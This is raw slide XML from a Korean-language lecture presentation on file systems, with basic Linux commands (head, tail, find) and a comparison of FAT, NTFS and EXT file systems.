                    <a:srgbClr val="2E75B6"/>
                  </a:solidFill>
                </a:rPr>
                <a:t>–n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머리</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="ko-KR" sz="1100"/>
                <a:t>(head</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="ko-KR" sz="1100" dirty="0"/>
                <a:t>)</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a:p>
              <a:pPr>
                <a:lnSpc>
                  <a:spcPct val="140000"/>
                </a:lnSpc>
              </a:pPr>
              <a:r>
                <a:rPr lang="nb-NO" altLang="ko-KR" sz="1100" dirty="0">
                  <a:solidFill>
                    <a:srgbClr val="2E75B6"/>
                  </a:solidFill>
                </a:rPr>
                <a:t>[root@localhost log]# </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="ko-KR" sz="1100" dirty="0">
                  <a:solidFill>
                    <a:srgbClr val="2E75B6"/>
                  </a:solidFill>
                </a:rPr>
                <a:t>tail –n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꼬리</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="ko-KR" sz="1100" dirty="0"/>
                <a:t>(tail)</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ACAA963-207D-4258-81F9-AD4DF900099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05265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find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파일이나 디렉토리를 검색</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find /etc -name </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="ko-KR" sz="1100" dirty="0">
                  <a:solidFill>
                    <a:srgbClr val="2E75B6"/>
                  </a:solidFill>
                </a:rPr>
                <a:t>"</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="ko-KR" sz="1100" dirty="0" err="1">
                  <a:solidFill>
                    <a:srgbClr val="2E75B6"/>
                  </a:solidFill>
                </a:rPr>
                <a:t>ssh</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="ko-KR" sz="1100" dirty="0">
                  <a:solidFill>
                    <a:srgbClr val="2E75B6"/>
                  </a:solidFill>
                </a:rPr>
                <a:t>*"</a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:pPr>
                <a:lnSpc>
                  <a:spcPct val="140000"/>
                </a:lnSpc>
              </a:pPr>
              <a:r>
                <a:rPr lang="en-US" altLang="ko-KR" sz="1100"/>
                <a:t>/etc</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="ko-KR" sz="1100" dirty="0"/>
                <a:t>/</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="ko-KR" sz="1100" dirty="0" err="1"/>
                <a:t>pam.d</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="ko-KR" sz="1100" dirty="0"/>
                <a:t>/</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="ko-KR" sz="1100" dirty="0" err="1"/>
                <a:t>sshd</a:t>
              </a:r>
              <a:endParaRPr lang="en-US" altLang="ko-KR" sz="1100" dirty="0"/>
            </a:p>
            <a:p>
              <a:pPr>
                <a:lnSpc>
                  <a:spcPct val="140000"/>
                </a:lnSpc>
              </a:pPr>
              <a:r>
                <a:rPr lang="en-US" altLang="ko-KR" sz="1100"/>
                <a:t>/etc</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="ko-KR" sz="1100" dirty="0"/>
                <a:t>/</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="ko-KR" sz="1100" dirty="0" err="1"/>
                <a:t>rc.d</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="ko-KR" sz="1100" dirty="0"/>
                <a:t>/</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="ko-KR" sz="1100" dirty="0" err="1"/>
                <a:t>init.d</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="ko-KR" sz="1100" dirty="0"/>
                <a:t>/</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="ko-KR" sz="1100" dirty="0" err="1"/>
                <a:t>sshd</a:t>
              </a:r>
              <a:endParaRPr lang="en-US" altLang="ko-KR" sz="1100" dirty="0"/>
            </a:p>
            <a:p>
              <a:pPr>
                <a:lnSpc>
                  <a:spcPct val="140000"/>
                </a:lnSpc>
              </a:pPr>
              <a:r>
                <a:rPr lang="en-US" altLang="ko-KR" sz="1100"/>
                <a:t>/etc</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="ko-KR" sz="1100" dirty="0"/>
                <a:t>/</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="ko-KR" sz="1100" dirty="0" err="1"/>
                <a:t>ssh</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/ssh_host_dsa</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="ko-KR" sz="1100"/>
                <a:t>_key</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="ko-KR" sz="1100" dirty="0"/>
                <a:t>.pub</a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:pPr>
                <a:lnSpc>
                  <a:spcPct val="140000"/>
                </a:lnSpc>
              </a:pPr>
              <a:r>
                <a:rPr lang="en-US" altLang="ko-KR" sz="1100"/>
                <a:t>/etc</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="ko-KR" sz="1100" dirty="0"/>
                <a:t>/</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="ko-KR" sz="1100" dirty="0" err="1"/>
                <a:t>ssh</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="ko-KR" sz="1100" dirty="0"/>
                <a:t>/ssh_host</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="ko-KR" sz="1100"/>
                <a:t>_key</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="ko-KR" sz="1100" dirty="0"/>
                <a:t>.pub</a:t>
              </a:r>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ssh_host_rsa</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="ko-KR" sz="1100" err="1"/>
                <a:t>_</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="ko-KR" sz="1100"/>
                <a:t>key</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/ssh_host_rsa</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="ko-KR" sz="1100"/>
                <a:t>_key</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="ko-KR" sz="1100" dirty="0"/>
                <a:t>.pub</a:t>
              </a:r>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ssh_config</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ssh_host_dsa</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="ko-KR" sz="1100" err="1"/>
                <a:t>_</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="ko-KR" sz="1100"/>
                <a:t>key</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ssh_host</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="ko-KR" sz="1100" err="1"/>
                <a:t>_</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="ko-KR" sz="1100"/>
                <a:t>key</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sshd_config</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584890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파일 시스템</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909540227"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="3921981" y="1690688"/>
          <a:ext cx="3959749" cy="4671384"/>
        </p:xfrm>
        <a:graphic>
          <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/table">
            <a:tbl>
              <a:tblPr/>
              <a:tblGrid>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함초롬바탕" panose="02030604000101010101" pitchFamily="18" charset="-127"/>
                          <a:hlinkClick r:id="rId2" action="ppaction://hlinksldjump"/>
                        </a:rPr>
                        <a:t>Def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정의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종류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3" action="ppaction://hlinksldjump"/>
                        </a:rPr>
                        <a:t>History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역사</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FSSTND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 파일시스템 표준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5" action="ppaction://hlinksldjump"/>
                        </a:rPr>
                        <a:t>Structure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구조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6" action="ppaction://hlinksldjump"/>
                        </a:rPr>
                        <a:t>TimeStamp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타임스탬프</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7"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0176164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이란</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" kern="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>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28AAD373-7753-4C96-B8AC-6E8251D91388}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1286378" y="1907769"/>
            <a:ext cx="9187112" cy="369332"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" b="1" i="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Noto Sans"/>
              </a:rPr>
              <a:t>운영체제</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" b="1" i="0" dirty="0">
                <a:effectLst/>
                <a:latin typeface="Noto Sans"/>
              </a:rPr>
              <a:t>가 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" b="1" i="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Noto Sans"/>
              </a:rPr>
              <a:t>파일</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" b="1" i="0" dirty="0">
                <a:effectLst/>
                <a:latin typeface="Noto Sans"/>
              </a:rPr>
              <a:t>이나 자료를 쉽게 발견 및 접근할 수 있도록 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" b="1" i="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Noto Sans"/>
              </a:rPr>
              <a:t>보관 또는 조직</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" b="1" i="0" dirty="0">
                <a:effectLst/>
                <a:latin typeface="Noto Sans"/>
              </a:rPr>
              <a:t>하는 체제</a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" altLang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="10" name="직사각형 9">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A50CAAA6-B1B6-4348-A091-D9D6A83E0824}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6214308" y="2890663"/>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317" y="3333223"/>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1427568" y="3026021"/>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6564229" y="3678528"/>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4687306" y="3041058"/>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4687305" y="3647283"/>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2345480" y="3156826"/>
            <a:ext cx="724093"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5662864" y="3712686"/>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3069573" y="3041057"/>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3069573" y="3346584"/>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21" idx="1"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4045132" y="3411987"/>
            <a:ext cx="642173" cy="300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1375126" y="2941720"/>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E26F3793-A531-4CE8-8CA3-6758CCB93D35}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1556841" y="2688732"/>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spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="23686357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종류</a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" altLang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="TextBox 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{847A5460-5906-4590-B2F0-D17A5A4F9C37}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="954965" y="2113808"/>
            <a:ext cx="3258422" cy="4043548"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="accent5">
              <a:lumMod val="7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F A T</a:t>
            </a:r>
          </a:p>
          <a:p>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a:t>File Allocation Table</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="ko-KR" sz="1100" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="285750" indent="-285750">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1100" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>파일을 할당한 정보를 테이블로 표현</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구조가 간단</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="285750" indent="-285750">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1100" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>디스크 용량을 많이 소모하지 않음</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="285750" indent="-285750">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1100" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>저용량 볼륨에서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대용량 볼륨의 비효율적 이용</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="ko-KR" sz="1100" dirty="0">
              <a:solidFill>
                <a:srgbClr val="FF0000"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="285750" indent="-285750">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1100" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>NT, DOS, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1100" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>윈도 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1100" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>95, USB </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1100" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>등</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1100" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1100" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>사용</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="285750" indent="-285750">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1100" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>보안에 취약 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1100" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1100" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t> 접근 제어 불가능</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="285750" indent="-285750">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1100" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>종류 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1100" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>: FAT12, FAT16, FAT32 </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1100" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>    (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1100" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>최대 표현 가능한 클러스터의 수를 비트 수</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1100" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="ko-KR" altLang="en-US" sz="1200" dirty="0">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="12" name="TextBox 11">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{EB84960C-E904-4E98-B3F0-A5E75C110592}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4448976" y="2113808"/>
            <a:ext cx="3258422" cy="4043548"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="F09456"/>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N T F S</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="ctr"/>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dirty="0"/>
              <a:t>Windows </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1100"/>
              <a:t>NT File System</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="ko-KR" sz="1100" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="285750" indent="-285750">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1100" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>NT</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1100" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>전용 파일시스템</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대용량 볼륨에 대한 효과적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디스크 공간의 효과적 사용</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보안과 암호화 또한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파일 접근 속도를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특정 파일이나 디렉토리 자동 압축 기능</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다른 운영체제에서 호환 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1100" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>안됌</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="ko-KR" sz="1100" dirty="0">
              <a:solidFill>
                <a:srgbClr val="FF0000"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="285750" indent="-285750">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1100" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>저용량 볼륨에서 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1100" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>FAT </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1100" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>보다 느림</a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" altLang="en-US" sz="1200" dirty="0">
              <a:solidFill>
                <a:srgbClr val="FF0000"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="13" name="TextBox 12">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B6FFC123-1B1E-41F4-B844-C0C17D3F16E2}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7942988" y="2113808"/>
            <a:ext cx="3258422" cy="4043548"/>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E X T</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" altLang="ko-KR" dirty="0">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="285750" indent="-285750">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1200"/>
              <a:t>Extended File System</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리눅스 운영체제를 목표로 만들어짐</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MFS-&gt;EXT1-&gt;EXT2-&gt;EXT3-&gt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1200" dirty="0"/>
              <a:t>EXT4</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="285750" indent="-285750">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>MSF </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>보다 파일 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1200" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>쵀대</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> 크기</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>이름 크기 등이 보완됨</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 시스템 손상 가능성이 더 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1200" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>줄어듬</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err="1"/>
              <a:t>저널링</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1200" dirty="0"/>
              <a:t>로그</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>를 만들어서 시스템이 비정상적으로 종료 되었을 경우 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1200" dirty="0"/>
              <a:t>파일 시스템을 복구</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>하는 기능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공간 할당을 마지막까지 지연하므로 성능이 향상</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="14" name="화살표: 오른쪽 13">
            <a:hlinkClick r:id="rId2" action="ppaction://hlinksldjump"/>
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{47E31B1B-EE25-4462-B797-7D8800029E7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96130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47CF78D7-B18E-4382-B520-5CEE04C197E8}"/>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7" name="타원 16">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{5B158657-F38E-4C68-A9FD-CCFB6E13D379}"/>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8" name="TextBox 17">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{80F07B68-D1B4-484D-AA2A-7C07C5F73970}"/>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 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1400" dirty="0"/>
              <a:t>(3</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1400" dirty="0"/>
              <a:t>기</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1400" dirty="0"/>
              <a:t>)</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="19" name="직선 화살표 연결선 18">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{68A5E407-9071-45B6-BB5C-D24793E19F84}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
            <a:stCxn id="17"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정보보호대학원 | 사이버국방학과 | 학과소개">
